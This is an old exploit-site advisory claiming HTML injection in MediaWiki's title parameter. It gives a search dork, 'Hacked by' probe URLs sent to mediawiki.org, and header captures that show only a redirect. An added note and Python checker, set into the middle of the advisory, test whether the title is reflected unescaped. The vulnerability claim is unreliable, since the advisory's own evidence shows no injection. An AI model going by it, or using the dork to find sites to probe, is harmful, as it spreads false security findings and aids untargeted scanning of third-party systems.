Mediawiki (index.php) HTML Injection & unknown vulnerability issue
Posted on 01 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mediawiki (index.php) HTML Injection & unknown vulnerability issue</title></head><body><pre>
===================================================================
Mediawiki (index.php) HTML Injection & unknown vulnerability issue
===================================================================

[Inj3ct0r ASCII banner: "Exploit database separated by exploit type (local, remote, DoS, etc.)"]

[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com

########################################
I'm eidelweiss, a member of the Inj3ct0r Team
########################################

Vendor: www.MEDIAWIKI.ORG
Download: http://www.mediawiki.org/wiki/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Thanks: neogabriel a.k.a Ahmed Yusuf (who gave me the inspiration for this exploit)
Dork: "powered by mediawiki" inurl:"index.php?title=" (13,200,000 results, 0.18 seconds)

=====================================================================
Description:
You can read the full description of MediaWiki at www.mediawiki.org :P
=====================================================================

-=[ vuln ]=-
http://127.0.0.1/wiki/index.php?title=XSS

-=[ P0C ]=-
http://127.0.0.1/wiki/index.php?title= Hacked by eidelweiss

Note: the only behaviour documented on this page is that the value of the title parameter is normalised (leading blank dropped, spaces turned into underscores) and copied into the Location header of a 301 redirect to /wiki/<Title>. No request here carries HTML metacharacters and no response body is shown with the title reflected unescaped, which is what an HTML injection claim requires. Before treating this as a vulnerability, repeat the probe with a title containing markup and confirm the markup reaches the page body without entity encoding.

-=[ vendor Demo P0C ]=-
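To separate "the title is echoed into a redirect" from "the title is rendered as HTML", the check below parses a captured response, reports a 3xx as a same-host redirect with the normalised title in the path, and for a 200 classifies whether a marker with angle brackets came back verbatim, entity-encoded, or not at all. This is an added example and not code from the advisory or from MediaWiki; it runs offline on constructed responses (the 301 is rebuilt from the headers shown on this page, the two HTML bodies are made up for the demonstration), and the helper names parse_raw_response, classify_reflection and assess_probe are this example's own.

```python
"""Reflection check for the index.php?title= probe described above.

Added example; not part of the advisory and not MediaWiki code. Runs
offline on constructed responses. Helper names and sample bodies are
this example's own assumptions.
"""
import html
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class HttpResponse:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def parse_raw_response(raw: str) -> HttpResponse:
    """Split a raw HTTP/1.x response into status code, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpResponse(status, headers, body)


def classify_reflection(body: str, marker: str) -> str:
    """How was the probe string reflected into an HTML body?

    'unescaped' - the raw marker, angle brackets included, appears verbatim;
                  only this would justify calling it HTML injection.
    'escaped'   - only the entity-encoded form appears; the browser shows text.
    'absent'    - the marker is not reflected at all.
    """
    if marker in body:
        return "unescaped"
    if html.escape(marker) in body:
        return "escaped"
    return "absent"


def assess_probe(resp: HttpResponse, title: str, expected_host: str) -> dict:
    """Summarise what a response to index.php?title=<title> actually proves."""
    if 300 <= resp.status < 400:
        location = resp.headers.get("location", "")
        parts = urlsplit(location)
        # Normalisation visible in the advisory: surrounding blanks dropped,
        # spaces replaced by underscores in the redirect target path.
        normalised = title.strip().replace(" ", "_")
        return {
            "finding": "redirect",
            "location": location,
            "same_host": parts.netloc.lower() == expected_host.lower(),
            "title_in_path": normalised in parts.path,
        }
    return {"finding": classify_reflection(resp.body, title)}


# Constructed from the 301 shown in the advisory (headers abbreviated).
REDIRECT_301 = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Server: Apache\r\n"
    "Location: http://www.mediawiki.org/wiki/Hacked_By_eidelweiss\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
)

# A probe carrying HTML metacharacters, unlike the plain words in the advisory.
PROBE = "<b>eidelweiss</b>"

# Constructed body: title entity-encoded, the safe case.
ESCAPED_BODY = (
    "<html><head><title>&lt;b&gt;eidelweiss&lt;/b&gt; - Wiki</title></head>"
    "<body><h1>&lt;b&gt;eidelweiss&lt;/b&gt;</h1></body></html>"
)
# Constructed body: the hypothetical failure the advisory's title implies,
# the probe dropped into markup verbatim. Not observed on any wiki here.
UNESCAPED_BODY = "<html><body><h1><b>eidelweiss</b></h1></body></html>"


if __name__ == "__main__":
    print(assess_probe(parse_raw_response(REDIRECT_301),
                       " Hacked By eidelweiss", "www.mediawiki.org"))
    for label, body in (("escaped", ESCAPED_BODY), ("unescaped", UNESCAPED_BODY)):
        print(label, classify_reflection(body, PROBE))
```

Against the advisory's own capture the result is a same-host redirect with the title in the path and nothing else; only an 'unescaped' verdict on a 200 response would support the "HTML Injection" label.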
http://www.mediawiki.org/w/index.php?title= Hacked By eidelweiss
redirects to http://www.mediawiki.org/wiki/Hacked_By_eidelweiss

Request headers:
Host=www.mediawiki.org
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us,en;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive

Response headers:
Status=Moved Permanently - 301
Date=Tue, 01 Jun 2010 09:11:42 GMT
Server=Apache
Cache-Control=private, s-maxage=0, max-age=0, must-revalidate
Vary=Accept-Encoding,Cookie
Last-Modified=Tue, 01 Jun 2010 09:11:42 GMT
Location=http://www.mediawiki.org/wiki/Hacked_By_eidelweiss
Content-Encoding=gzip
Content-Length=20
Content-Type=text/html; charset=utf-8
X-Cache=MISS from sq75.wikimedia.org, MISS from sq72.wikimedia.org
X-Cache-Lookup=MISS from sq75.wikimedia.org:3128, MISS from sq72.wikimedia.org:80

=========================| -=[ E0F ]=- |=========================

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-01]</pre></body></html>